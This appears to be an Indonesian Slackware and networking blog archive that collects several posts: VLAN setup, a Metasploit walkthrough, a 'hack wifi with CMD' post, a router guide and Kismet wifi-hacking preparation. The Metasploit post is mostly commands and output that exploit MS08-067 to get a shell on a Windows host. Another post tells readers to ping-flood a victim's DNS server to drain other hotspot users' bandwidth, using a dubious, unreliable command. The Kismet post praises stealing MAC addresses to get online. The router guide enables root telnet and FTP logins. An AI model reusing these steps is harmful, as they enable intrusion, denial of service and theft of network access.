Jumat, 08 Maret 2013

VLAN pada Slackware

Pehaman mengenai vlan sdh di jelaskan di postingan sebelumnya di sini

Saatnya mengimplementasikan VLAN di Slackware

1. Berikut config untuk creat vlan di slackware
# vconfig add ethx 10
example :
# vconfig add eth0 10

ethx = ethernet berapa yang akan diberi vlan
10 = vlan ID

2. Jika ada error
WARNING: Could not open /proc/net/vlan/config. Maybe you need to load the 8021q module, or maybe you are not using PROCFS??

3. berarti module 8021q belum di load, untuk ngeload module tersebut, ketik perintah :
# modprobe 8021q

4. Untuk menambahkan IP pada interface vlan :
# ip addr add [IP Address] brd + dev ethx.[vlan-id]
example :
# ip addr add 10.1.1.254/24 brd + dev eth0.10

5. semua config diatas jika di restart akan hilang, jika ingin tetep di load waktu reboot, tambahkan baris berikut ke /etc/rc.d/rc.local :
# ifconfig ethx up
# modprobe 8021q
# vconfigu add ethx [vlan-id]
# ip addr add [IP Address] brd + dev ethx.[vlan-id]

saya kasih opsi ifconfig ethx up karena kondisi disini eth tersebut masih down jika reboot, karena di eth tersebut tidak dikasih IP, IP ada di vlan.

Teknik Dasar Metasploit

Posting ini kubuat sebagai salah satu contoh audit security halah.. pentest aja yah bahasanya di network lokal tempatku bekerja. Ndak pake kata-kata hacking lah.. Wong cuman manfaatin tools yang disebar di inet kok disebut hacking :p. Soalnya banyak kale yang test metasploit seperti ini dan dibilang hacking bla-bla-bla. :-p. Go to side corner lamerzz… Post ini juga buat bayar utang ma hardie soal metasploit :D Ini coy dah kutepatin janjinya. silahkan coba sendiri ya. cara yang paling mudah sebenarnya bisa menggunakan OS BackTrack, tapi disini saya menggunakan ubuntu yang telah diinstall metasploit. Langkah instalasinya bisa dilihat disini.

Metasploit : msfconsole
Lets go.. pertama kali kita coba dengan testing manual menggunakan metasploit console (msfconsole) yang mana test ini dilakukan pada single mesin windows xp sp2 dengan melakukan percoban exploit ms windows MS08-067 yaitu vulner pada microsoft windows di port 445 beberapa waktu yang lalu yang sempet bikin microsoft kelimpungan :D . Dari terminal console ketik perintah berikut, seperti pada gambar dibawah:

$ msfconsole


Untuk perintah-perintah lainnya bisa dipelajari dengan mengetikkan help :
    msf > help
    Core Commands
    =============
    
    Command       Description
    -------       -----------
    ?             Help menu
    back          Move back from the current context
    banner        Display an awesome metasploit banner
    cd            Change the current working directory
    connect       Communicate with a host
    exit          Exit the console
    help          Help menu
    info          Displays information about one or more module
    irb           Drop into irb scripting mode
    jobs          Displays and manages jobs
    load          Load a framework plugin
    loadpath      Searches for and loads modules from a path
    quit          Exit the console
    resource      Run the commands stored in a file
    route         Route traffic through a session
    save          Saves the active datastores
    search        Searches module names and descriptions
    sessions      Dump session listings and display information about sessions
    set           Sets a variable to a value
    setg          Sets a global variable to a value
    show          Displays modules of a given type, or all modules
    sleep         Do nothing for the specified number of seconds
    unload        Unload a framework plugin
    unset         Unsets one or more variables
    unsetg        Unsets one or more global variables
    use           Selects a module by name
    version       Show the framework and console library version numbers
Untuk melihat list exploits-nya , gunakan perintah :
    msf > show exploits
List seluruh exploit yang ada kira-kira seperti ini (saya paste sebagian saja biar ndak terlalu panjang) :
    windows/smb/ms05_039_pnp              Microsoft Plug and Play Service Overflow
    windows/smb/ms06_025_rasmans_reg      Microsoft RRAS Service RASMAN Registry Overflow
    windows/smb/ms06_025_rras             Microsoft RRAS Service Overflow
    windows/smb/ms06_040_netapi           Microsoft Server Service NetpwPathCanonicalize Overflow
    windows/smb/ms06_066_nwapi            Microsoft Services MS06-066 nwapi32.dll
    windows/smb/ms06_066_nwwks            Microsoft Services MS06-066 nwwks.dll
    windows/smb/ms08_067_netapi           Microsoft Server Service Relative Path Stack Corruption
Scan mesin target menggunakan nmap. Dalam contoh kasus kali ini kita gunakan kompi dg ip 192.168.1.28 :
    msf > sudo nmap -v -sS -A -O 192.168.1.28
    [*] exec: sudo nmap -v -sS -A -O 192.168.1.28
    [sudo] password for test:Starting Nmap 4.62 ( http://nmap.org ) at 2009-03-21 23:50 CIT
    Initiating ARP Ping Scan at 23:50
    Scanning 192.168.1.28 [1 port]
    Host 192.168.1.28 appears to be up ... good.
    Interesting ports on 192.168.1.28:
    Not shown: 1712 closed ports
    PORT    STATE SERVICE      VERSION
    135/tcp open  msrpc        Microsoft Windows RPC
    139/tcp open  netbios-ssn
    445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
    MAC Address: 00:1E:8C:67:59:F9 (Asustek Computer)
    Device type: general purpose
    Running: Microsoft Windows XP
    OS details: Microsoft Windows 2000 SP4, or Windows XP SP2 or SP3
    Network Distance: 1 hop
    TCP Sequence Prediction: Difficulty=258 (Good luck!)
    IP ID Sequence Generation: Incremental
    Service Info: OS: Windows
Dari hasil scan kita ketahui bahwa kemungkinan OS-nya menggunakan OS Windows XP dengan port 445-nya terbuka. Mari kita coba kompi ini dengan menggunakan exploit windows/smb/ms08_067_netapi.
    msf > use windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi) >
Lihat opsi dari exploit ini dengan mengetikkan show options :
    msf exploit(ms08_067_netapi) > show options
    Module options:
    Name     Current Setting  Required  Description
    ----     ---------------  --------  -----------
    RHOST                     yes       The target address
    RPORT    445              yes       Set the SMB service port
    SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
    
    Exploit target:
    Id  Name
    --  ----
    0   Automatic Targeting
Dari opsi diatas, maka kita perlu set terlebih dahulu RHOST ( komputer target) dengan mengetikkan :
    msf exploit(ms08_067_netapi) > set rhost 192.168.1.28
    rhost => 192.168.1.28
Untuk RPORT, kita tidak perlu melakukan setting apa-apa karena vulnerability ini memang mengeksploitasi vulnerability di port 445. Untuk exploit target diisi dengan OS komputer target. Dalam langkah ini kita menggunakan angka 0 yang berarti automatic target. Untuk melihat OS target apa saja, ketik :
    msf exploit(ms08_067_netapi) > show targets
    Exploit targets:
    Id  Name
    --  ----
    0   Automatic Targeting
    1   Windows 2000 Universal
    2   Windows XP SP0/SP1 Universal
    3   Windows XP SP2 English (NX)
    4   Windows XP SP3 English (NX)
    -------- cut -----------
Sekarang kita tentukan jenis payload yang ingin dipakai. Dalam langkah ini saya ingin menggunakan tcp_bind shell (akses command prompt di kompi target) :
    msf exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp
    payloads => windows/shell_bind_tcp
Untuk melihat payload apa saja dalam metasploit, gunakan perintah :
    msf exploit(ms08_067_netapi) > show payloads
    Compatible payloads
    ===================
    Name                                            Description
    ----                                            -----------
    generic/debug_trap                Generic x86 Debug Trap
    generic/debug_trap/bind_ipv6_tcp  Generic x86 Debug Trap, Bind TCP Stager (IPv6)
    generic/debug_trap/bind_nonx_tcp  Generic x86 Debug Trap, Bind TCP Stager (No NX Support)
    generic/debug_trap/bind_tcp       Generic x86 Debug Trap, Bind TCP Stager
    ----------- dipotong sampai disini ---------------
Nahh.. setting sudah selesai dilakukan. Untuk melihat hasil konfigurasinya bisa dicek kembali dengan menggunakan show options :
    msf exploit(ms08_067_netapi) > show options
    Module options:
    Name     Current Setting  Required  Description
    ----     ---------------  --------  -----------
    RHOST    192.168.1.28     yes       The target address
    RPORT    445              yes       Set the SMB service port
    SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
    
    Payload options (windows/shell_bind_tcp):
    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  thread           yes       Exit technique: seh, thread, process
    LPORT     4444             yes       The local port
    RHOST     192.168.1.28     no        The target address
    Exploit target:
    Id  Name
    --  ----
    0   Automatic Targeting
sekarang jalankan exploit :
    msf exploit(ms08_067_netapi) > exploit
    [*] Started bind handler
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP Service Pack 2 - lang:English
    [*] Selected Target: Windows XP SP2 English (NX)
    [*] Triggering the vulnerability...
    [*] Command shell session 1 opened (192.168.1.6:33270 -> 192.168.1.28:4444)
    
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    
    C:\WINDOWS\system32>ipconfig
    ipconfig
    Windows IP Configuration
    Ethernet adapter Local Area Connection:
    
        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.1.28
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.254
    
    C:\WINDOWS\system32>
Dan ternyata emang masih bolong… :p
Metasploit : msfcli
Dari langkah-langkah diatas… sebenarnya bisa dilakukan exploitasi dengan menggunakan satu perintah dari console, dan diakomodir dengan menggunakan msfcli yang notabene sebenarnya adalah metasploit command line interface.
Untuk melihat manual perintahnya bisa dilihat dari help maupun manpage-nya wiki-nya metasploit.
    bash-4.1$ msfcli –help
    [*] Please wait while we load the module tree...
    Error: Invalid module: --help
    Usage: /usr/local/bin/msfcli   [mode]
    =================================================================
    Mode           Description
    ----           -----------
    (H)elp         You're looking at it baby!
    (S)ummary      Show information about this module
    (O)ptions      Show available options for this module
    (A)dvanced     Show available advanced options for this module
    (I)DS Evasion  Show available ids evasion options for this module
    (P)ayloads     Show available payloads for this module
    (T)argets      Show available targets for this exploit module
    (AC)tions      Show available actions for this auxiliary module
    (C)heck        Run the check routine of the selected module
    (E)xecute      Execute the selected module
So.. mari kita coba. Contoh kasusnya sama seperti artikel msfconsole biar ndak capek nulisnya yaitu:
    IP Addr Target : 192.168.1.28
    Port target : 445
    Exploit  : windows/smb/ms08_067_netapi
    Payload  : windows/shell_bind_tcp
    Exploit target : 0
Dan implementasinya menjadi seperti ini :
    bash$ msfcli exploit/windows/smb/ms08_067_netapi RHOST=192.168.1.28 TARGET=0 PAYLOAD=generic/shell_bind_tcp E
    [*] Please wait while we load the module tree...
    [*] Started bind handler
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP Service Pack 2 - lang:English
    [*] Selected Target: Windows XP SP2 English (NX)
    [*] Triggering the vulnerability...
    [*] Command shell session 1 opened (192.168.1.6:36804 -> 192.168.1.28:4444)
    
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    
    C:\WINDOWS\system32>ipconfig
    ipconfig
    Windows IP Configuration
    Ethernet adapter Local Area Connection:
        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.1.28
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.254
    C:\WINDOWS\system32>
Implementasi yang sama juga bisa dilakukan pada metasploit GUI (msfgui) dan metasploit berbasis web (msfweb). Silahkan dicoba sendiri karena saya malas upload gambarnya :-p. Dari teknik dasar ini silahkan dikembangkan dengan teknik-teknik yang lain.

Sumber : http://www.masrony.com/2009/03/metasploit-i-teknik-dasar/

Metasploit di Slacware

Metasploit Framework adalah sebuah platform pengembangan untuk membuat tool keamanan dan exploit. Metasploit framework digunakan oleh profesional bidang keamanan jaringan untuk melakukan tes penetrasi, digunakan juga oleh administrator sistem untuk memverifikasi instalasi dan patch sistemnya, vendor produk untuk melakukan tes kelemahan dan peneliti-peneliti keamanan lainnya di dunia. Metasploit framework ditulis menggunakan bahasa pemrograman Ruby dan termasuk juga komponen lainnya yang ditulis dalam bahasa C dan assembler.

Terdiri dari apa saja?

Metasploit Framework terdiri dari tools, libraries, modules dan user interfaces. Fungsi dasar dari metasploit framework adalah memunculkan module, membiarkan penggunanya mengkonfigurasikan modul exploit dan mencobanya pada target yang dituju. Jika exploit berhasil, payload akan tereksekusi pada sistem target dan pengguna akan disediakan sebuah shell untuk berinteraksi dengan payload.

Download

Saat ini tersedia dalam versi 3.4.3. Dapat didownload di Sini

Instalasi

Proses penginstalan tidak begitu sulit, ada baiknya Anda mendownload dengan perintah wget di consule :)

# wget http://www.metasploit.com/releases/framework-3.4.1-linux-i686.run

Setelah proses download sudah selesai, saatnya kita pasang di slackware kesayangan kita

# ./framework-3.4.1-linux-i686.run

ikuti prosesnya sampai selesai, dan jalankan dengan perintah

# msfconsole --> untuk mode consule
# msfweb --> untuk mode web

Biarkan program msfweb berjalan di terminal, jika ingin menghentikan cukup gunakan Ctrl-C. Buka browser dan ketik di url http://127.0.0.1:55555/

Cara Hack Wifi dengan CMD

Cara Hack Wifi dengan CMD -
Artikel kali ini masih tentang Tutorial Hacking sob, yups kali ini Hacker-Romantis akan share Cara Hack Wifi Menggunakan CMD. langsung saja
animasi komputer, x-gen


Check this on :

1. buka CMD, klik start >> all programs >> Command promft
2. setelah jendela CMD terbuka ketikkan perintah ipconfig /all
3. setelah itu cari target DNS server lihat tampilan di bawah.


jadi target kita kali ini 10.0.1.2


4.  sekarang ketikkan perntah ping -L 500 10.0.1.2 -t lalu tekan enter : 10.0.1.2 adalah target kita, silahkan ganti dengan DNS korban anda.


5.  setelah itu akan muncul gambar seperti dibawah ini sob.



cara ini berfungsi untuk menyedot bandwith pengguna yang main di area sekitar hotspot tersebut.
pada ping -L 500 10.0.1.2 -t anda juga bisa mengubah angka 500 jadi 1000 atau lebih, tapi jangan terlalu berlebihan ya, kasian pengguna lain.

Cara Membuat PC Router di Slackware

Konfigurasi PC Router
1. Pertama setting ip public dan ip local
Ip public (yang diberikan oleh isp) dipasang pada eth0 dan ip local (terserah anda) dipasang pada
eth1.
Caranya:
2. Masuk ke directory /etc/rc.d/ dengan mengetikkan root@darkstar# cd /etc/rc.d
3. Kemudian edit file rc.inet1.conf:
root@darkstar:/etc/rc.d# vi rc.inet1.conf
dengan mengisi kolom ipaddr-nya (ctrl+i, untuk mengedit)
# Config information for eth0:
IPADDR[0]=”192.168.1.106”
NETMASK[0]=”255.255.255.0″
USE_DHCP[0]=””
DHCP_HOSTNAME[0]=””

# Config information for eth1:
IPADDR[1]=”10.0.0.1″
NETMASK[1]=”255.0.0.0″
USE_DHCP[1]=””
DHCP_HOSTNAME[1]=””
# Default gateway IP address:
GATEWAY=”192.168.1.1”
kemudian save dengan cara esc:x
Ket: yang berwarna, awalnya kosong (default)
4. Kembali ke root@darkstar awal dengan mengetikkan cd
5. Setelah itu input ip di eth0 dan eth1:
# ifconfig eth0 192.168.1.106 netmask 255.255.255.0
# ifconfig eth1 10.0.0.1 netmask 255.0.0.0
6. Aktifkan ip forwardingnya dengan cara.
# /etc/rc.d/rc.ip_forward start
Jika permission denied, berikan permission dengan cara
# chmod 755 /etc/rc.d/rc.ip_forward
Kemudian aktifkan.
# /etc/rc.d/rc.ip_forward start
7. langkah berikutnya masukkan DNS pada file resolv.conf
masuk ke directory /etc/ kemudian edit file resolv.conf dengan cara,
# vi resolv.conf
Isi file menjadi:
nameserver 202.69.96.123
nameserver 202.69.98.123
kemudian save dengan cara esc:wq
setelah itu kembali ke root@darkstar
8. lalu jalankan service dns :
# chmod 755 /etc/rc.d/rc.bind
# /etc/rc.d/rc.bind start
9. menyeting proses peroutingannya, yaitu :
# route add -net 192.168.1.0 netmask 255.255.255.0 dev eth0
# route add -net 10.0.0.0 netmask 255.0.0.0 dev eth1
10. masuk lagi ke directory /etc/rc.d/
11. kemudian edit isi shell rc.local dengan mengetikkan # nano rc.local menjadi:
iptables -A INPUT -i eth0 -j ACCEPT
iptables -A INPUT -i eth1 -j ACCEPT
iptables -A FORWARD -i eth1 -o eth0 -j ACCEPT
iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT
iptables -A OUTPUT -o eth0 -j ACCEPT
iptables -A OUTPUT -o eth1 -j ACCEPT
iptables -t nat -A POSTROUTING -s 10.0.0.0/255.0.0.0 -d 0/0 -j MASQUERADE
12. kemudian beri permission dan jalankan:
#chmod 755 rc.local
# ./rc.local
13. Kemudian pada pc router, test dengan ping ip_local, ping ip_public, ping ke client, dan
ping dns
14. Sekarang setting ip pada pc client dengan gateway 10.0.0.1 (ip local router eth1) dan dns
sama dengan dns router.
15. Kemudian pada pc client, test dengan ping gateway dan ping dns.
Konfigurasi Telnet
1. Membuka port 23 (Telnet)
root@darkstar: /etc# pico inetd.conf
. . .
#Telnet server :
#Telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
Cari baris perintah diatas kemudian hapus tanda “#” nya, lalu save (ctrl + x)
root@darkstar : /etc# kill -HUP $(cat /var/run/inetd.pid)
root@darkstar : /etc# nmap 10.0.0.1
2. Agar bisa login sebagai root
# sed -i ‘/^#[pt]/ s/#//’ /etc/securetty
3. Selanjutnya masuk ke windows(client)
Masuk ke Microsoft telnet
Ketik: o 10.0.0.1 23
4. Selanjutnya login dengan username yang ada di slackware
Konfigurasi FTP
Buka gerbang telnet dan FTP pada slackware caranya:
1.Masuk ke directory etc
2.Setelah itu masuk ke #cd /etc/
3.Edit file inetd.conf. masuk ke # vi inetd.conf
….
# Very Secure File Transfer Protocol (FTP) server.
#ftp stream tcp nowait root /usr/sbin/tcpd vsftpd
….
4.Kemudian hapus tanda pagar <#> di depan FTP di derctory yang sama
5.Agar bisa login as root, tambahkan script berikut pada /etc/proftpd.conf di bawah
DefaultRoot ~
IdentLookups off
ServerIdent on “FTP Server ready.”
RootLogin on
Komputer client
1. Masuk ke FTP lalu masukan nama user dan password
2. buka firefox
3. ketikan address ftp//:root@10.0.0.1
4. masukan username dan password
MENUTUP PORT
1. Lihat terlebih dahulu port yang terbuka dengan cara
root@darkstar : /etc# Nmap 10.0.0.1
2. Lalu, kita beri tanda pagar kembali pada port yang akan ditutup
root@darkstar : /etc# pico inetd.conf
3. Kita berikan kembali tanda “#” pada port telnet dan ftp
. . .
# Very Secure File Transfer Protocol (FTP) server.
#ftp stream tcp nowait root /usr/sbin/tcpd vsftpd
. . .
#Telnet server :
#Telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
. . .
4. Setelah itu, kita save
Dengan menekan ctrl + x
5. Kita restart terlebih dahulu
root@darkstar : # kill-HUP $(cat /var/run/inetd.pid)
6. Lalu kita lihat kembali
root@darkstar : /etc# nmap 10.0.0.1
CONFIGURASI WEB SERVER
1. Menjalankan service apache
2. root@darkstar : # /usr/sbin/apachectl start
3. Copy directory web ke /usr/www/htdocs/
Lewat web browser ketik ip 10.0.0.1/nama_folder_web
untuk lebih lengkapnya bisa di download versi laporan pdfnya berisi konfigurasi pc router, telnet as root/user, ftp server as root/user, remote admin, menutup port 21 dan 23, web server, aplikasi mail server bisa di download disini .

Persiapkan slackware untuk hacking wifi

Mempersiapkan notebook kita untuk hacking wifi, tentunya harus hardware kita harus support dengan monitoring mode. maksudnya, card wifi kita dapat membaca paket2 yang terbang bebas dan dapat dengan mudah melakukan aksi sniffing. Nah, tools yang dibutuhkan sangatlah familiar bagi hacker wifi, yaitu kismet dan digabungkan dengan aircrack-ng
Nah, anda tinggal install aja direktory aktif:
 -------------------------------------------------------------------------------------------------------------------------

#install pkg *.tgz
 -------------------------------------------------------------------------------------------------------------------------
Selanjutnya tinggal configurasi deh. Anggap saja kita tidak mempunyai documen atau tidak mempunyai bacaan tentang konfig kismet ini. Kita dapat memanfaatkan README dari kismet untuk konfigurasinya. Nah, biar gampang, update dlu DB agar dengan cepat mecari letak file. Misalnya letak file README kismet yang sudah terinstall. Cukup dengan perintah:
 -------------------------------------------------------------------------------------------------------------------------
#updatedb
 -------------------------------------------------------------------------------------------------------------------------

tunggu aja sampe selesai ya
Selanjutnya, cari de file readme dengan command :
 -------------------------------------------------------------------------------------------------------------------------

#locate kismet | grep doc
 -------------------------------------------------------------------------------------------------------------------------
 Nih hasilnya

 -------------------------------------------------------------------------------------------------------------------------
/usr/doc/kismet-2008_05_R1
/usr/doc/kismet-2008_05_R1/CHANGELOG
/usr/doc/kismet-2008_05_R1/docs
/usr/doc/kismet-2008_05_R1/docs/DEVEL.client
/usr/doc/kismet-2008_05_R1/docs/DEVEL.ipmap
/usr/doc/kismet-2008_05_R1/docs/README.extras
/usr/doc/kismet-2008_05_R1/docs/DEVEL.groupmap
/usr/doc/kismet-2008_05_R1/docs/DEVEL.ssidmap
/usr/doc/kismet-2008_05_R1/kismet.SlackBuild
/usr/doc/kismet-2008_05_R1/TODO
/usr/doc/kismet-2008_05_R1/slack-desc
/usr/doc/kismet-2008_05_R1/README
/usr/doc/kismet-2008_05_R1/GPL
 -------------------------------------------------------------------------------------------------------------------------

Tingal baca de dengan less.
 -------------------------------------------------------------------------------------------------------------------------

#less /usr/doc/kismet-2008_05_R1/README
 -------------------------------------------------------------------------------------------------------------------------

Tujuannya, biar kita tau support atau tidaknya wifi kita. ntar yang perlu dicari yaitu dibagian driver dengan hardwarenya. nich yang perlu diperhatikan isi dari file tersebut.

 -------------------------------------------------------------------------------------------------------------------------
Capture Sources
A capture source in Kismet is anything which provides packets to the Kismet
engine. Capture sources define the underlying engine needed to capture
data from the interface, how to change channel, and how to enter rfmon
mode. It is necessary to tell Kismet what specific type of card you use
because different drivers often use different methods to report information
and enter monitor mode.
Source type Cards OS Driver
————— ——————- ———– ————————-
acx100 TI ACX100 Linux ACX100 http://acx100.sourceforge.net/
ACX100 drivers handle the 22mbit cards branded by D-Link
and others.
admtek ADMTek Linux ADMTek http://www.latinsud.com/adm8211/ (Patches) http://aluminum.sourmilk.net/adm8211/ (GPL driver)
ADMTek drivers used in many consumer 802.11b cards. With
the patches above, quasi-rfmon is possible – these cards
appear to be almost entirely software controlled and
always in a rfmon-like state. This card WILL BROADCAST
while in rfmon, rendering the sniffer visible.
The fully GPL drivers are supported, in addition to the
hacks to the non-free drivers.
Masih banyak lagi,

nokia8x0 Nokia 800,810 http://maemo.org/
Nokia 8×0 capture interface, including support for
FCS validation.
The Nokia drivers appear to exhibit instability while
capturing where they stop reporting packets. This may
be minimized by setting the Network Scan interval to
“never” in the control panel->networking section.
orinoco Lucent, Orinoco Linux Patched orinoco_cs http://airsnort.shmoo.com/orinocoinfo.html
The Orinoco drivers which have mainlined into the Linux
kernel do support monitor mode, however only specific firmware
versions are supported and often they do not work.
An up-ported version of the older Orinoco drivers which more
reliably supported rfmon may be available at: http://www.projectiwear.org/~plasmahh/orinoco.html
Generally, Orinoco cards are not recommended for use with
Kismet due to these limitations.
orinoco_14 Lucent, Orinoco Linux Orinoco 0.14+ https://savannah.nongnu.org/projects/orinoco/
This source is deprecated and should only be used with
pre-release versions of a driver since merged into the Linux
kernel.
pcapfile n/a Any n/a
Capture interface: ‘/path/to/file’
The pcapfile capture source feeds a stored 802.11-encap
dump file through the Kismet engine again. This can be
useful for debugging or rescanning old logs for
alert conditions. Pcapfile sources are only available
if Kismet was compiled with libpcap support.
prism2_openbsd Prism/2 OpenBSD Kernel
Full support for Prism2 under OpenBSD.
prism54g PrismGT Linux prism54 http://www.prism54.org
PrismGT 802.11g drivers supporting monitor mode.
radiotap_bsd_ab Radiotap BSD Kernel
Dual-band cards with radiotap headers.
radiotap_bsd_a Radiotap BSD Kernel
802.11a cards (or dual-band on 11a channels only) with
radiotap headers.
radiotap_bsd_b Radiotap BSD Kernel
802.11b/g cards (or dual-band on 11b channels only) with
radiotap headers.
rt2400 Ralink 2400 11b Linux rt2400-gpl http://rt2x00.serialmonkey.com/
Ralink 2400 802.11b cards using the serialmonkey GPL’d
rt2x00 drivers. Must use 1.2.2 beta 2 or newer drivers.
rt2500 Ralink 2500 11g Linux rt2500-gpl http://rt2x00.serialmonkey.com/
Ralink 2500 802.11g cards using the serialmonkey GPL’d
rt2x00 drivers. Must use 1.1.0 beta 2 or newer drivers.
rt73 Ralink 73 11g Linux rt73-gpl-cvs http://rt2x00.serialmonkey.com/
Ralink 73 802.11g USB cards using the serialmonkey GPL’d
rt79 drivers (tested only with CVS driver versions)
rt8180 Realtek 8180 11b Linux rtl8180-sa2400 http://rtl8180-sa2400.sourceforge.net/
Realtek 8180 based cards (there seem to be an awful lot of
them) using the GPL drivers.
viha Airport OSX viha http://www.dopesquad.net/security/
Monitor mode support for Airport under OSX. Does not
support Airport Extreme.
vtar5k Atheros 802.11a Linux vtar5k http://team.vantronix.net/ar5k/
vtar5k drivers handle some Atheros 802.11a cards. Chances
are you’ll have better luck with madwifi drivers.
wlanng_legacy Prism/2 Linux wlan-ng 0.1.3 and earlier http://www.linux-wlan.com/
Old wlan-ng drivers didn’t support pcap capturing and
use a netlink socket to the kernel. These are still in
use on some embedded systems (like the Zaurus).
wlanng Prism/2 Linux wlan-ng 0.1.4 – 0.1.9 http://www.linux-wlan.com/
Wlan-ng prism2 drivers prior to the AVS headers.
wlanng_avs Prism/2 Linux wlan-ng 0.2.0+ http://www.linux-wlan.com/
Newer wlan-ng drivers support a new header type and
slightly different monitor commands to report wepped
packets.
wrt54g Linksys WRT54G Linux linksys http://seattlewireless.net/index.cgi/LinksysWrt54g
Capture interface: ‘wlX’
Support for the newer firmware versions on the
WRT54G/S/L devices (and any others using the broadcom
reference chipset).
Some systems generate a secondary device, prism0, while
in monitor mode and require special care while channel
hopping, it is no longer necessary to specify the prism0
device explicitly for Kismet.
wsp100 NetChem WSP100 Any n/a http://networkchemistry.com/
Capture interface: ‘host:port’
The WSP100 is an embedded device which reports 802.11
packets over UDP. The wsp100 capture source is
(generally) system agnostic, however over time it has
been less maintained than others. If you’d like to
send me patches for this, please let me know.
zd1211 ZyDAS USB Linux zd1211 http://zd1211.ath.cx
The ZD1211 drivers have had some regressions which lead to
data corruption while changing channel. Some versions
work, and typically the aircrack patches resolve the
corruption issues if your version doesn’t properly handle
rfmon.
Chipsets known to NOT WORK:
Broadcom – No linux drivers, only useable with ndiswrapper or
linuxant wrappers around windows drivers.
*** UPDATE ***
See the bcm43xx source type entry. There are
experimental reverse-engineered drivers which have
monitor mode support now under Linux! If they don’t
work, however, then too bad.
Airport Extreme – Really a Broadcom, with no rfmon in the OSX drivers.
*** UPDATE ***
See the bcm source for linux on ppc, it MAY work, it
may not. Currently theres no solution for OSX but
I’m looking for OSX hackers interested in redoing the
Kismet port and looking into adding more support.
Atmel – There is a hack for pseudo-monitor in USB. There is
currently no equivalent hack for PCMCIA.
HermesII – Proxim successor to the Orinoco/HermesI. No support
yet in the drivers, may be available in the future.
ndiswrapper – Anything using ndiswrapper is using WINDOWS drivers
AND CAN NOT BE USED WITH KISMET.

 -------------------------------------------------------------------------------------------------------------------------
Nah, dari sana anda perhatikan wifi anda dengan card yang support. Untuk mencocokkannya, gunakan aja utility dari aircrack-ng yaitu airmon-ng. Tinggal ketik aja airmon-ng :
 -------------------------------------------------------------------------------------------------------------------------

#airmond-ng
 -------------------------------------------------------------------------------------------------------------------------
Interface Chipset Driver
wlan0 Unknown ndiswrapper
Ternyata wifi saya nich makek ndiswrapper. ternyata blum bisa. soalnya card saya sebenarnya bcm4312dan sangat terbaru, tentunya blum ada driver linux yang support dengan kismet. Kepaksa makek driver windows deh untuk linuxnya.
Anggap saja punya saya support ya dengan driver b43 misalnya. Tinggal atur de file konfig si kismet yang berada di /etc/kismet/kismet.conf :
 -------------------------------------------------------------------------------------------------------------------------
#vim /etc/kismet/kismet.conf
 ------------------------------------------------------------------------------------------------------------------------- 

Yang paling penting itu, cari file ini lo.

 -------------------------------------------------------------------------------------------------------------------------
# User to setid to (should be your normal user)
suiduser=nick
# Sources are defined as:
# source=sourcetype,interface,name[,initialchannel]
# Source types and required drivers are listed in the README under the
# CAPTURE SOURCES section.
# The initial channel is optional, if hopping is not enabled it can be used
# to set the channel the interface listens on.
# YOU MUST CHANGE THIS TO BE THE SOURCE YOU WANT TO USE
# source=none,none,addme
source=zd1211,wlan1,zd1211rw – [phy2]
---------------------------------------------------------------------------------------------------------------------------
Yang nick ntu tinggal ganti dengan user login anda. Kemudian source=XXX,XXX,XXX isikan sesuai dengan driver yang terdeteksi oleh airmon-ng tadi.
Langkah terakhir, tinggal jalanin de kismetnya dengan akses root :
 -------------------------------------------------------------------------------------------------------------------------

#kismet
 -------------------------------------------------------------------------------------------------------------------------

Saatnya kismet beraksi. saatnya anda melakukan hacking wifi. Pokoke gampang dan enak banget lah bisa maling mac orang untuk ngenet dikampus.

VLAN Linux


VLAN adalah kependekan dari Virtual Local Area Network.

VLAN dalam sejarahnya merupakan sebuah teknik yang dikembangkan untuk mengatasi kemungkinan "rusaknya" hubungan atau interkoneksi jaringan komputer secara bersamaan (baca : network down) yang disebabkan oleh padatnya lalu-lintas broadcast - dengan cara membagi/memecah/memisah jaringan fisik (baca : layer 2 OSI atau switch) kedalam beberapa bagian sehingga lalu-lintas broadcast pada sebuah jaringan komputer dapat dilokalisir. Hal ini (VLAN) masih berhubungan dengan proses interkoneksi basis ethernet (baca : switch) yang menggunakan teknik broadcast sebagai alat pencatat/perekam ARP atau Address Resolution Protocol alamat layer 3 (IP Address) dan alamat layer 2 (MAC Address) pada CAM (Content Addressable Memory) table pada switch untuk meneruskan lalu-lintas data (baca : proses switching) pada port/interface.
Beberapa protokol yang dikembangkan untuk implementasi teknik VLAN terutama adalah :
  • Cisco Inter-Switch Link atau ISL (proprietary)
  • Open Standard VLAN adalah IEEE 802.1Q VLAN
Beberapa VLAN dapat beroperasi bersama-sama dalam sebuah switch yang sama. VLAN di konfigurasi menggunakan software (perintah Linux) dan tidak perlu mengkonfigurasi interface hardware.
Biasanya melalui hub / switch mengkaitkan semua node dalam sebuah LAN dan semua node tersebut dapat berkomunikasi satu sama lain tanpa menggunakan router. Jadi semua node di sebuah LAN A dapat dengan mudah berkomunikasi satu sama lain tanpa router. Tapi jika node di LAN A ingin berkomunikasi dengan LAN B, maka kita akan membutuhkan sebuah router. Oleh karenanya, setiap LAN biasanya terhubung satu sama lain menggunakan router.
Dalam implementasinya sebuah VLAN dapat dikelompokkan kepada beberapa hal berikut :
  • Nomor port atau interface pada switch
  • Subnet IP (merupakan yang paling umum digunakan karena beberapa alasan)
  • Alamat MAC pada remote host
Sedangkan tahap alokasi anggota VLAN dapat dikelompokkan sebagai berikut :
  • Statik pada switch
  • Dinamis
Catatan : Kenapa Subnet IP merupakan asosiasi VLAN yang paling sering digunakan?
